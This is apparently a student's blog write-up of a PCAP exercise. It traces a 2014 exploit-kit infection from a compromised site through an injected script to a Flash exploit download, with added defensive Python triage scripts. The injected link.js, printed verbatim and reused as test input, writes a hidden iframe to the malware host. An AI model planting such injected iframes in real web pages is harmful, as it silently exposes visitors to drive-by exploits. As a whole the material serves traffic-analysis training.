As my winter vacations come to an end, I decided to start warming up my brain in preparation for the final semester of my graduate program. Malware-Traffic-Analysis.net is a very good resource for practicing PCAP analysis. In this article, I describe my answers to the analysis questions of the PCAP file available here.
Note: In this article, I’m using Splunk / Wireshark for the complete PCAP analysis.
First, I ran Zeek over the PCAP (-C ignores bad checksums, -r reads from a file) to get the usual set of logs:
root@malnet:~/malware_traffic_exercises/2014-12-15# zeek -Cr 2014-12-15-traffic-analysis-exercise.pcap
root@malnet:~/malware_traffic_exercises/2014-12-15# ls
2014-12-15-traffic-analysis-exercise.pcap  conn.log  dhcp.log  dns.log  files.log  http.log  packet_filter.log  ssl.log  weird.log  x509.log
Hostnames of Windows VMs
The hostnames of the three Windows hosts are:
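Hostnames come out of the dhcp.log Zeek produced above: Windows clients put their NetBIOS name in DHCP option 12, which Zeek records in the host_name column. The script below is an added example, not part of the original write-up. It parses Zeek's TSV layout from the #fields header rather than hard-coding column positions, and runs over a constructed, abbreviated dhcp.log whose hostnames (EXAMPLE-PC1 and so on) are placeholders, not the exercise's answers; only the first client's IP and MAC are the ones identified later in this article.

```python
"""Recover Windows hostnames from a Zeek dhcp.log.

Windows clients send their NetBIOS name in DHCP option 12, which Zeek writes to
the host_name column of dhcp.log (Zeek 3.x field names; older Bro builds did not
log it). Added example, not code from the original post.
"""
from collections import defaultdict

# Constructed, abbreviated dhcp.log in Zeek's TSV layout, not the exercise's real
# log. Hostnames are placeholders; only the first client's IP/MAC are the ones the
# write-up identifies as infected.
SAMPLE_DHCP_LOG = "\n".join([
    "#separator \\x09",
    "#set_separator\t,",
    "#empty_field\t(empty)",
    "#unset_field\t-",
    "#path\tdhcp",
    "#fields\tts\tuids\tclient_addr\tserver_addr\tmac\thost_name\tassigned_addr\tmsg_types",
    "#types\ttime\tset[string]\taddr\taddr\tstring\tstring\taddr\tvector[string]",
    "1418660400.100\tCHhAvVGS1DHFjwGM9\t192.168.204.137\t192.168.204.254\t00:0c:29:9d:b8:6d\tEXAMPLE-PC1\t192.168.204.137\tREQUEST,ACK",
    "1418660401.200\tC4J4Th3PJpwUYZZ6gc\t192.168.204.150\t192.168.204.254\t00:0c:29:aa:bb:cc\tEXAMPLE-PC2\t192.168.204.150\tREQUEST,ACK",
    # A DISCOVER/OFFER pair: the client has no address yet and sent no option 12.
    "1418660402.300\tCmES5u32sYpV7JYN\t0.0.0.0\t192.168.204.254\t00:0c:29:dd:ee:ff\t-\t192.168.204.151\tDISCOVER,OFFER",
    "1418660403.400\tCz1k2M1PnDK4GUh2Qf\t192.168.204.151\t192.168.204.254\t00:0c:29:dd:ee:ff\tEXAMPLE-PC3\t192.168.204.151\tREQUEST,ACK",
    "#close\t2014-12-15-12-00-03",
])


def read_zeek_log(text):
    """Yield one dict per record, keyed by the #fields header.

    Other '#' lines (separator, types, open/close) are skipped and Zeek's unset
    marker '-' is returned as None, so callers never mistake it for a value.
    """
    fields = None
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#fields\t"):
                fields = line.split("\t")[1:]
            continue
        if fields is None:
            raise ValueError("data row before #fields header; not a Zeek ASCII log")
        values = line.split("\t")
        yield {k: (None if v == "-" else v) for k, v in zip(fields, values)}


def dhcp_hostnames(log_text):
    """Map (IP, MAC) -> set of hostnames that client announced in DHCP."""
    hosts = defaultdict(set)
    for rec in read_zeek_log(log_text):
        if rec.get("host_name") is None:
            continue
        # client_addr is 0.0.0.0 while the client is still acquiring a lease, so
        # prefer the address the server actually handed out.
        ip = rec.get("assigned_addr") or rec.get("client_addr")
        hosts[(ip, rec["mac"])].add(rec["host_name"])
    return dict(hosts)


if __name__ == "__main__":
    for (ip, mac), names in sorted(dhcp_hostnames(SAMPLE_DHCP_LOG).items()):
        print(f"{ip:<16} {mac}  {', '.join(sorted(names))}")
```

Keying on both IP and MAC matters in a lab PCAP: DHCP leases can move between VMs, and the MAC is what ties a hostname to the machine rather than to an address. If a host never completed a DHCP exchange in the capture, fall back to NBNS registrations or Kerberos AS-REQ names in Wireshark.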
IP Address of Infected Windows Host and Compromised Website
In the snap below, we can see that there is traffic to an unusual port, 22780. From past experience, I know that malware often communicates on unusual ports.
The machine with IP address 192[.]168[.]204[.]137 communicated with a remote host, epzqy[.]iphaeba[.]eu (IP address 168[.]235[.]69[.]248), and successfully downloaded three files.
After extracting the files using Wireshark, I hashed them and checked the hashes on VirusTotal.
root@malnet:~/malware_traffic_exercises/2014-12-15/Files# sha256sum *
db44b3235157740309e417751f5f244c3077fe35196456e1c19862bf18eee64f  48950
d748b12fd4058ca4bc3c2667ac5d445fa65e132a3bf0da0c067e20716240eb88  claimpl
9872a87cc4ce1b9430ad1567dd009191c441f9c7973ad6fb3a5f455ed6235866  land
The file 48950 was detected as malicious on VirusTotal and appears to exploit Adobe Flash; the file command confirms it is a compressed Flash (SWF) file:
root@malnet:~/malware_traffic_exercises/2014-12-15/Files# file 48950
48950: Macromedia Flash data (compressed), version 19
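"Macromedia Flash data (compressed), version 19" means the file starts with a CWS signature: the 8-byte header is plain, but everything after it is zlib-compressed, so strings, grep and YARA see nothing useful until it is inflated. The following script is an added example, not part of the original write-up and not tied to the 48950 file itself. It parses the header, inflates the body (handling the FWS, CWS and LZMA-compressed ZWS variants) and lists the top-level tag types, which is the quickest way to tell whether a Flash file carries ActionScript 3 bytecode (DoABC) or an embedded blob (DefineBinaryData), both typical of exploit kit payloads. The sample SWF it builds is constructed for the demonstration.

```python
"""Triage a file that `file` reports as "Macromedia Flash data (compressed)".

Added example, not code from the original post. Reads the 8-byte SWF header
(signature, version, declared length), undoes the compression that hides the body
from string searches, and lists the top-level tag types so an analyst can see
whether the file carries ActionScript 3 bytecode (DoABC) or an embedded blob
(DefineBinaryData). The sample SWF built at the bottom is constructed here; it
is not the 48950 file from the capture.
"""
import lzma
import struct
import zlib

COMPRESSION = {b"FWS": None, b"CWS": "zlib", b"ZWS": "lzma"}

# Tag codes from the SWF specification that matter most in triage.
TAG_NAMES = {
    0: "End", 1: "ShowFrame", 9: "SetBackgroundColor", 12: "DoAction",
    69: "FileAttributes", 76: "SymbolClass", 82: "DoABC", 87: "DefineBinaryData",
}


def parse_swf_header(data):
    """Signature, version and declared length from the header; rejects non-SWF input."""
    if len(data) < 8 or data[:3] not in COMPRESSION:
        raise ValueError("not a SWF file (expected FWS/CWS/ZWS signature)")
    return {
        "compression": COMPRESSION[data[:3]],
        "version": data[3],
        "declared_length": struct.unpack("<I", data[4:8])[0],  # includes the 8-byte header
    }


def decompress_swf(data):
    """Return the body that follows the header, inflated if the file is CWS or ZWS."""
    hdr = parse_swf_header(data)
    if hdr["compression"] is None:
        return data[8:]
    if hdr["compression"] == "zlib":
        return zlib.decompress(data[8:])
    # ZWS layout: 4-byte compressed size, 5-byte LZMA properties, raw LZMA stream.
    # Prepending the 8-byte uncompressed size turns it into an lzma_alone stream.
    props, stream = data[12:17], data[17:]
    size = struct.pack("<Q", hdr["declared_length"] - 8)
    return lzma.decompress(props + size + stream, format=lzma.FORMAT_ALONE)


def list_tags(body):
    """Tag names in file order, from the tag list after RECT, frame rate and frame count."""
    if not body:
        raise ValueError("empty SWF body")
    nbits = body[0] >> 3                 # RECT opens with a 5-bit field width
    pos = (5 + 4 * nbits + 7) // 8       # then four nbits-wide coordinates, byte aligned
    pos += 4                             # frame rate (2 bytes) and frame count (2 bytes)
    tags = []
    while pos + 2 <= len(body):
        code_and_len = struct.unpack_from("<H", body, pos)[0]
        code, length = code_and_len >> 6, code_and_len & 0x3F
        pos += 2
        if length == 0x3F:               # long form: a 32-bit length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        tags.append(TAG_NAMES.get(code, f"Tag{code}"))
        pos += length
        if code == 0:
            break
    return tags


def make_sample_swf(version=19, compressed=True):
    """Constructed SWF with a single DoABC tag (not the exercise's file)."""
    rect = bytes.fromhex("7800055f00000fa000")   # nbits=15 RECT, the usual 550x400 stage
    frame_rate, frame_count = b"\x00\x18", b"\x01\x00"
    doabc = struct.pack("<H", (82 << 6) | 4) + b"\x01\x00\x00\x00"  # 4-byte DoABC payload
    body = rect + frame_rate + frame_count + doabc + b"\x00\x00"   # End tag closes the list
    sig = b"CWS" if compressed else b"FWS"
    payload = zlib.compress(body) if compressed else body
    return sig + bytes([version]) + struct.pack("<I", 8 + len(body)) + payload


if __name__ == "__main__":
    sample = make_sample_swf()
    print(parse_swf_header(sample))
    print(list_tags(decompress_swf(sample)))
```

Run decompress_swf over the real extracted file and pipe the result to strings or a YARA scan; the declared_length check is also a cheap integrity test, since a truncated download will inflate to fewer bytes than the header promises.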
With the above information, it can be said that epzqy[.]iphaeba[.]eu, with IP address 168[.]235[.]69[.]248, is delivering malware. The domain http://www[.]theopen[.]be/, with IP address 213[.]186[.]33[.]19, is compromised because it redirects users to the malicious domain above. The Windows host with IP address 192[.]168[.]204[.]137 and MAC address 00:0c:29:9d:b8:6d is infected. No other host downloaded the malware, as seen earlier in the downloaded-files snap.
Redirect Link Between Malware Delivery and Compromised Website
In Wireshark, I exported the packets relevant to the infected Windows host, 192[.]168[.]204[.]137, into a separate PCAP file.
Using the filter http.request, I displayed all requests made by the infected host to remote domains. First contact with the malware delivery website was made at packet number 344, with the referrer http://theopen[.]be, which is the compromised website. Previously, there was another redirect from the compromised website to the domain col[.]reganhosting[.]com.
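The same chain can be pulled out of Zeek's http.log instead of clicking through Wireshark. The script below is an added example, not part of the original write-up. It consumes the headerless TSV that zeek-cut ts id.orig_h host uri referrer < http.log prints (Zeek spells the field referrer; the HTTP header is Referer) and walks Referer values backwards from the first request to the suspect host. It also lists everything the landing page loaded, because a pure Referer walk misses the injected script: an iframe written by a script reports the parent page, not the script, as its referrer. The hostnames and the victim IP are the ones named in this article; the timestamps and the shortened URIs are constructed.

```python
"""Reconstruct the redirect chain from the compromised site to the malware host.

Added example, not code from the original post. Input is the headerless TSV from
    zeek-cut ts id.orig_h host uri referrer < http.log
Hostnames match the write-up; timestamps and shortened URIs are constructed.
"""
from urllib.parse import urlsplit

SAMPLE_ZEEK_CUT = "\n".join([
    "1418660500.000\t192.168.204.137\twww.theopen.be\t/\t-",
    "1418660500.300\t192.168.204.137\tcol.reganhosting.com\t/link.js\thttp://www.theopen.be/",
    "1418660500.900\t192.168.204.137\tepzqy.iphaeba.eu:22780\t/flow/land/\thttp://www.theopen.be/",
    "1418660501.400\t192.168.204.137\tepzqy.iphaeba.eu:22780\t/flow/48950\thttp://epzqy.iphaeba.eu:22780/flow/land/",
    "1418660502.000\t192.168.204.150\twww.example.com\t/\t-",  # unrelated host, must be ignored
])


def parse_zeek_cut(text):
    """Rows from zeek-cut output; '-' means unset. The Host header may carry a port."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, host, uri, referrer = line.split("\t")
        rows.append({
            "ts": float(ts),
            "src": src,
            "host": host.split(":")[0].lower(),
            "uri": uri,
            "referrer": None if referrer == "-" else referrer,
        })
    return rows


def _page_key(url):
    """(host, path) identity of a page, so a Referer can be matched to the request that fetched it."""
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path or "/"


def redirect_chain(rows, target_host):
    """Requests from the root page down to the first request for target_host."""
    hits = [r for r in rows if r["host"] == target_host.lower()]
    if not hits:
        return []
    cur = min(hits, key=lambda r: r["ts"])
    chain, seen = [cur], {(cur["host"], cur["uri"])}
    while cur["referrer"]:
        key = _page_key(cur["referrer"])
        if key in seen:                      # guard against referrer loops
            break
        parents = [r for r in rows if r["src"] == cur["src"]
                   and (r["host"], r["uri"]) == key and r["ts"] <= cur["ts"]]
        if not parents:                      # referring page is not in the capture
            break
        cur = max(parents, key=lambda r: r["ts"])
        chain.append(cur)
        seen.add(key)
    chain.reverse()
    return chain


def loaded_by(rows, page_url):
    """Every resource whose Referer is page_url: the scripts and iframes that page pulled in."""
    key = _page_key(page_url)
    return [r for r in rows if r["referrer"] and _page_key(r["referrer"]) == key]


if __name__ == "__main__":
    rows = parse_zeek_cut(SAMPLE_ZEEK_CUT)
    print(" -> ".join(f"{r['host']}{r['uri']}" for r in redirect_chain(rows, "epzqy.iphaeba.eu")))
    for r in loaded_by(rows, "http://www.theopen.be/"):
        print("loaded by compromised page:", r["host"] + r["uri"])
```

Two caveats when running this against a real http.log: the Host header keeps a non-default port (here :22780), so hosts are normalised before comparison, and Referer is client-supplied, so a chain that ends with "referring page not in the capture" may mean a redirect via HTTP 302 or JavaScript location change rather than a gap in the PCAP; check the status codes of the preceding requests in that case.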
Using Wireshark, I extracted the index.html page of the compromised website and the link.js file that was downloaded from
In link.js, there is a redirect to the malware delivery website, as can be seen below:
root@malnet:~/malware_traffic_exercises/2014-12-15/Files# cat link.js
document.write(("<iframe src='http://epzqy.iphaeba.eu:22780/flow/17610/avenue/67785/source/43028/total/7782/misery/swirl/some/29364/patience/interval/ford/settle/knot/55468/anyone/land/' name='yBnYN' width=13 height=10 frameborder=0 marginheight=0 marginwidth=0 scrolling=no> "));
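Everything about that iframe is a red flag on its own: the src points off-site, it uses a non-standard port, and a 13x10 frame with no border and no scrollbar is invisible to the victim. The script below is an added example, not part of the original write-up. It scores every iframe in a page or script on exactly those traits, so the same check can be run over every HTML and JavaScript object exported from a capture. It finds tags by regex, so the document.write() wrapper used here does not hide the iframe from it; the link.js body is the one shown above, pasted in as the test input, and the page host www.theopen.be is taken from this article.

```python
"""Flag injected iframes in web content extracted from a capture.

Added example, not code from the original post. Each <iframe> found in the
text is scored on the traits of the link.js redirect: off-site src, non-standard
port, tiny dimensions, CSS hiding. Finding tags by regex means a tag written from
inside document.write() is still caught.
"""
import re
from urllib.parse import urlsplit

# The link.js body from the capture, pasted verbatim for the demonstration.
LINK_JS = (
    "document.write((\"<iframe src='http://epzqy.iphaeba.eu:22780/flow/17610/avenue/"
    "67785/source/43028/total/7782/misery/swirl/some/29364/patience/interval/ford/"
    "settle/knot/55468/anyone/land/' name='yBnYN' width=13 height=10 frameborder=0 "
    "marginheight=0 marginwidth=0 scrolling=no> \"));"
)

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def iframe_attrs(tag_body):
    """Parse name=value pairs from inside an <iframe ...> tag (quoted or bare values)."""
    return {
        m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
        for m in ATTR_RE.finditer(tag_body)
    }


def _px(value):
    """Integer pixel size from a width/height attribute, or None if absent or not in px."""
    if value is None:
        return None
    digits = value.strip().lower()
    if digits.endswith("px"):
        digits = digits[:-2]
    return int(digits) if digits.isdigit() else None


def suspicious_iframes(text, page_host, tiny_px=30):
    """One finding per iframe that shows signs of injection.

    page_host is the site the content was served as (the compromised site), so a
    src pointing anywhere else counts as off-site.
    """
    page_host = page_host.lower()
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = iframe_attrs(m.group(1))
        src = attrs.get("src", "")
        url = urlsplit(src)
        host = (url.hostname or "").lower()
        port = url.port or (443 if url.scheme == "https" else 80)
        reasons = []
        if host and host != page_host and not host.endswith("." + page_host):
            reasons.append("off-site src")
        if port not in (80, 443):
            reasons.append(f"non-standard port {port}")
        width, height = _px(attrs.get("width")), _px(attrs.get("height"))
        if any(d is not None and d <= tiny_px for d in (width, height)):
            reasons.append(f"tiny dimensions {attrs.get('width')}x{attrs.get('height')}")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if reasons:
            findings.append({"src": src, "host": host, "port": port, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_iframes(LINK_JS, "www.theopen.be"):
        print(f"{f['host']}:{f['port']}  {'; '.join(f['reasons'])}")
```

A legitimate embed (a video player from the site's own domain at a normal size) produces no finding, while the injected frame trips three checks at once. Treat the regex as a triage aid, not a parser: heavily obfuscated injections that assemble the tag from string fragments need the script to be deobfuscated or executed in a sandbox first.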
In the index.html of the compromised website, there is a redirect to the malicious website:
In this article, I described my analysis for the provided PCAP file. The most important aspect of this analysis was to find the redirect link that occurs from the compromised website to the malware delivery domain.
Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!